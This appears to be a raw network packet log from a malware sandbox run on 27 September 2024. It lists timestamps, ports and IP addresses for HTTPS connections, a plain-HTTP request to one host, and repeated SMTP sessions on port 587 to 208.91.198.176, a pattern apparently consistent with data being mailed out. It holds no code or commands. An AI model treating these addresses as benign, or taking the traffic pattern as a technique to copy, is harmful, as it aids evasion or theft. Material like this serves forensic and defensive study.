                                                                      Sep 27, 2024 10:39:13.494050026 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.495338917 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.495358944 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.495454073 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.495460987 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.495502949 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.525060892 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.525088072 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.525152922 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.525154114 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.525166988 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.525192976 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.525228024 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.525273085 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.525279999 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.525322914 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.584755898 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.584778070 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.584863901 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.584878922 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.584944963 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.584985971 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.585004091 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.585038900 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.585046053 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.585072041 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.585093975 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.585438967 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.585454941 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.585510015 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.585519075 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.585553885 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.585691929 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.585707903 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.585745096 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.585752010 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.585778952 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.585791111 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.586385965 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.586401939 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.586441994 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.586447954 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.586469889 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.586482048 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.587654114 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.587668896 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.587729931 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.587740898 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.587780952 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.617985964 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.618002892 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.618057966 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.618100882 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.618119955 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.618132114 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.618205070 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.677797079 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.677824974 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.677874088 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.677887917 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.677937031 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.677953005 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.678071976 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.678087950 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.678122044 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.678129911 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.678150892 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.678168058 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.678972006 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.678992987 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.679027081 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.679035902 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.679052114 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.679074049 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.679582119 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.679589987 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.679662943 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.679670095 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.679707050 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.680377960 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.680396080 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.680425882 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.680433035 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.680455923 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.680471897 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.681618929 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.681633949 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.681670904 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.681678057 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.681699991 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.681719065 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.713861942 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.713880062 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.713927984 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.713937044 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.713994026 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.714138031 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.714152098 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.714194059 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.714202881 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.714240074 CEST61245443192.168.2.6176.99.3.36
                                                                      Sep 27, 2024 10:39:13.769747019 CEST44361245176.99.3.36192.168.2.6
                                                                      Sep 27, 2024 10:39:13.769773006 CEST44361245176.99.3.36192.168.2.6
Sep 27, 2024 10:39:13.769819975 CEST    443  61245  176.99.3.36      192.168.2.6
Sep 27, 2024 10:39:13.769927979 CEST    443  61245  176.99.3.36      192.168.2.6
Sep 27, 2024 10:39:13.770004034 CEST  61245    443  192.168.2.6      176.99.3.36
Sep 27, 2024 10:39:13.770004034 CEST  61245    443  192.168.2.6      176.99.3.36
Sep 27, 2024 10:39:13.770004034 CEST  61245    443  192.168.2.6      176.99.3.36
Sep 27, 2024 10:39:13.770037889 CEST    443  61245  176.99.3.36      192.168.2.6
Sep 27, 2024 10:39:13.770188093 CEST    443  61245  176.99.3.36      192.168.2.6
Sep 27, 2024 10:39:13.770243883 CEST  61245    443  192.168.2.6      176.99.3.36
Sep 27, 2024 10:39:13.770256996 CEST    443  61245  176.99.3.36      192.168.2.6
Sep 27, 2024 10:39:13.770277023 CEST    443  61245  176.99.3.36      192.168.2.6
Sep 27, 2024 10:39:13.770309925 CEST  61245    443  192.168.2.6      176.99.3.36
Sep 27, 2024 10:39:13.770325899 CEST  61245    443  192.168.2.6      176.99.3.36
Sep 27, 2024 10:39:13.917725086 CEST  61245    443  192.168.2.6      176.99.3.36
Sep 27, 2024 10:39:14.877304077 CEST  61245    443  192.168.2.6      176.99.3.36
Sep 27, 2024 10:39:28.318377972 CEST  61253    443  192.168.2.6      172.67.74.152
Sep 27, 2024 10:39:28.318428993 CEST    443  61253  172.67.74.152    192.168.2.6
Sep 27, 2024 10:39:28.318511963 CEST  61253    443  192.168.2.6      172.67.74.152
Sep 27, 2024 10:39:28.324947119 CEST  61253    443  192.168.2.6      172.67.74.152
Sep 27, 2024 10:39:28.324971914 CEST    443  61253  172.67.74.152    192.168.2.6
Sep 27, 2024 10:39:28.790468931 CEST    443  61253  172.67.74.152    192.168.2.6
Sep 27, 2024 10:39:28.790664911 CEST  61253    443  192.168.2.6      172.67.74.152
Sep 27, 2024 10:39:28.973361015 CEST  61253    443  192.168.2.6      172.67.74.152
Sep 27, 2024 10:39:28.973407984 CEST    443  61253  172.67.74.152    192.168.2.6
Sep 27, 2024 10:39:28.973992109 CEST    443  61253  172.67.74.152    192.168.2.6
Sep 27, 2024 10:39:29.025325060 CEST  61253    443  192.168.2.6      172.67.74.152
Sep 27, 2024 10:39:29.473100901 CEST  61253    443  192.168.2.6      172.67.74.152
Sep 27, 2024 10:39:29.515407085 CEST    443  61253  172.67.74.152    192.168.2.6
Sep 27, 2024 10:39:29.579454899 CEST    443  61253  172.67.74.152    192.168.2.6
Sep 27, 2024 10:39:29.579529047 CEST    443  61253  172.67.74.152    192.168.2.6
Sep 27, 2024 10:39:29.579699993 CEST  61253    443  192.168.2.6      172.67.74.152
Sep 27, 2024 10:39:29.696343899 CEST  61253    443  192.168.2.6      172.67.74.152
Sep 27, 2024 10:39:29.709019899 CEST  61254     80  192.168.2.6      208.95.112.1
Sep 27, 2024 10:39:29.714349031 CEST     80  61254  208.95.112.1     192.168.2.6
Sep 27, 2024 10:39:29.714422941 CEST  61254     80  192.168.2.6      208.95.112.1
Sep 27, 2024 10:39:29.714550018 CEST  61254     80  192.168.2.6      208.95.112.1
Sep 27, 2024 10:39:29.719985008 CEST     80  61254  208.95.112.1     192.168.2.6
Sep 27, 2024 10:39:30.175986052 CEST     80  61254  208.95.112.1     192.168.2.6
Sep 27, 2024 10:39:30.228125095 CEST  61254     80  192.168.2.6      208.95.112.1
Sep 27, 2024 10:39:30.852664948 CEST  61254     80  192.168.2.6      208.95.112.1
Sep 27, 2024 10:39:30.858120918 CEST     80  61254  208.95.112.1     192.168.2.6
Sep 27, 2024 10:39:30.858215094 CEST  61254     80  192.168.2.6      208.95.112.1
Sep 27, 2024 10:39:31.171669006 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:31.177118063 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:31.177242041 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:31.863718033 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:31.869550943 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:31.874593973 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:32.028579950 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:32.049669981 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:32.054681063 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:32.205918074 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:32.208182096 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:32.213023901 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:32.371865988 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:32.372162104 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:32.378123999 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:32.529844046 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:32.534398079 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:32.539354086 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:32.692858934 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:32.693131924 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:32.698151112 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:32.853941917 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:32.854136944 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:32.859549046 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:33.014722109 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:33.014929056 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:33.020451069 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:33.191643000 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:33.192235947 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:33.192277908 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:33.192305088 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:33.192322016 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:33.197213888 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:33.197318077 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:33.197510958 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:33.468732119 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:33.509339094 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:33.527435064 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:33.532481909 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:33.684020042 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:33.684199095 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:33.685208082 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:33.689428091 CEST    587  61255  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:33.689537048 CEST  61255    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:33.690287113 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:33.690368891 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:34.285824060 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:34.288938999 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:34.293859005 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:34.448801994 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:34.480710030 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:34.485702038 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:34.639841080 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:34.653814077 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:34.658788919 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:34.815177917 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:34.815320969 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:34.821995974 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:34.976739883 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:34.976938009 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:34.982007027 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:35.136542082 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:35.136774063 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:35.141783953 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:35.297631025 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:35.297821045 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:35.303651094 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:35.460177898 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:35.460342884 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:35.465225935 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:35.638395071 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:35.639648914 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:35.639718056 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:35.639759064 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:35.639796019 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:35.639831066 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:35.639918089 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:35.639965057 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:35.640039921 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:35.640079975 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:35.640088081 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:35.647453070 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:35.650254011 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:35.650264978 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:35.650274038 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:36.055511951 CEST    587  60905  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:36.103112936 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:45.757827044 CEST  60910    443  192.168.2.6      104.26.13.205
Sep 27, 2024 10:39:45.757853985 CEST    443  60910  104.26.13.205    192.168.2.6
Sep 27, 2024 10:39:45.757910967 CEST  60910    443  192.168.2.6      104.26.13.205
Sep 27, 2024 10:39:45.761814117 CEST  60910    443  192.168.2.6      104.26.13.205
Sep 27, 2024 10:39:45.761828899 CEST    443  60910  104.26.13.205    192.168.2.6
Sep 27, 2024 10:39:46.219613075 CEST    443  60910  104.26.13.205    192.168.2.6
Sep 27, 2024 10:39:46.219702005 CEST  60910    443  192.168.2.6      104.26.13.205
Sep 27, 2024 10:39:46.221571922 CEST  60910    443  192.168.2.6      104.26.13.205
Sep 27, 2024 10:39:46.221589088 CEST    443  60910  104.26.13.205    192.168.2.6
Sep 27, 2024 10:39:46.221868038 CEST    443  60910  104.26.13.205    192.168.2.6
Sep 27, 2024 10:39:46.274990082 CEST  60910    443  192.168.2.6      104.26.13.205
Sep 27, 2024 10:39:46.276988983 CEST  60910    443  192.168.2.6      104.26.13.205
Sep 27, 2024 10:39:46.319406986 CEST    443  60910  104.26.13.205    192.168.2.6
Sep 27, 2024 10:39:46.385106087 CEST    443  60910  104.26.13.205    192.168.2.6
Sep 27, 2024 10:39:46.385268927 CEST    443  60910  104.26.13.205    192.168.2.6
Sep 27, 2024 10:39:46.385333061 CEST  60910    443  192.168.2.6      104.26.13.205
Sep 27, 2024 10:39:46.387859106 CEST  60910    443  192.168.2.6      104.26.13.205
Sep 27, 2024 10:39:46.397775888 CEST  60911     80  192.168.2.6      208.95.112.1
Sep 27, 2024 10:39:46.402719975 CEST     80  60911  208.95.112.1     192.168.2.6
Sep 27, 2024 10:39:46.402801037 CEST  60911     80  192.168.2.6      208.95.112.1
Sep 27, 2024 10:39:46.402874947 CEST  60911     80  192.168.2.6      208.95.112.1
Sep 27, 2024 10:39:46.407691002 CEST     80  60911  208.95.112.1     192.168.2.6
Sep 27, 2024 10:39:46.875243902 CEST     80  60911  208.95.112.1     192.168.2.6
Sep 27, 2024 10:39:46.931253910 CEST  60911     80  192.168.2.6      208.95.112.1
Sep 27, 2024 10:39:47.453233957 CEST  60911     80  192.168.2.6      208.95.112.1
Sep 27, 2024 10:39:47.462544918 CEST     80  60911  208.95.112.1     192.168.2.6
Sep 27, 2024 10:39:47.465125084 CEST  60911     80  192.168.2.6      208.95.112.1
Sep 27, 2024 10:39:47.577843904 CEST  60905    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:47.916186094 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:47.921051979 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:47.922200918 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:48.495675087 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:48.495978117 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:48.500937939 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:48.656013012 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:48.659544945 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:48.664441109 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:48.820480108 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:48.821693897 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:48.826534986 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:48.983197927 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:48.983772993 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:48.988679886 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:49.212616920 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:49.212950945 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:49.217976093 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:49.374878883 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:49.375241995 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:49.380176067 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:49.537868023 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:49.538279057 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:49.543131113 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:49.868890047 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:49.869097948 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:49.873902082 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:50.049453020 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:50.049995899 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:50.050060987 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:50.050084114 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:50.050106049 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:50.056091070 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:50.056102991 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:50.056113005 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:50.056123972 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:50.316258907 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:50.353040934 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:50.358016014 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:50.514698029 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:50.515012980 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:50.515746117 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:50.520318031 CEST    587  60912  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:50.520392895 CEST  60912    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:50.520597935 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:50.520673990 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:51.066147089 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:51.066314936 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:51.071264029 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:51.221191883 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:51.221904993 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:51.226787090 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:51.378034115 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:51.378743887 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:51.385137081 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:51.535609007 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:51.535824060 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:51.540633917 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:51.690300941 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:51.690522909 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:51.695416927 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:51.846152067 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:51.851798058 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:51.856807947 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:52.008380890 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:52.008574009 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:52.013519049 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:52.164768934 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:52.165067911 CEST  60913    587  192.168.2.6      208.91.198.176
Sep 27, 2024 10:39:52.169914961 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:52.337244987 CEST    587  60913  208.91.198.176   192.168.2.6
Sep 27, 2024 10:39:52.339211941 CEST  60913    587  192.168.2.6      208.91.198.176
